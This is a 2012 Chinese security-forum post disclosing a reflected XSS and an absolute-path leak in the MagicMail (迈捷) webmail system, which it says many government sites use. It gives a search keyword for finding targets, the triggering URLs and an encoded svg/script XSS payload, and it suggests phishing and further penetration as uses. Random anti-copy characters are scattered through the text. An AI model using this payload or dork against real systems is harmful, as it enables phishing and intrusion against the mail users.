找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1806|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞! Z- u) e" A( F$ |9 w; w0 h
( D7 `6 [% s. ^7 J
$ B6 \9 `  \: P: z, u0 z0 Y  c. u
包含  一个反射性XSS  以及  绝对路径泄漏, T1 I1 s  p0 R/ W( L
看了看 貌似全部是linux的。
6 ?" P8 x% @9 p- O* q2 b* E
, r" {6 |/ K  c; Y" r7 y) U  |2 T$ a关键字:迈捷邮件系统 by MagicMail
8 _) ]( l" ~. o3 o* v$ g# O( y. ~3 F  Q* j' ]* J$ H( t  \( e  K
可以看到很多政府网站都用这个邮件系统
/ q' k  d/ e. `9 \5 n- ?0 R9 s- b' C) b
绝对路径 http://madman.in/index.php?login_type=declare&language=
, H6 |# H, h  F2 g. k  \
' b' C) l* h7 T, U5 n
- P: y) d  {  {3 g7 ~6 r: B2 u( y; t  v0 Y! A& J. G5 h5 V8 }$ P
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E2 O3 {4 \" u" P: P+ [  F  C

  @0 Q# T  Y. l+ y: Y& I+ r& h3 A4 D. e5 ]) }
" y  C: y& d- |4 s9 J
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等1 E& n) Z: D. B* A$ {  U  }
! M0 E8 o& j; B( R4 b
修复方案:看官方补丁吧。
  ]1 R6 ~; m5 U) n( l. D6 d  C5 \0 R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表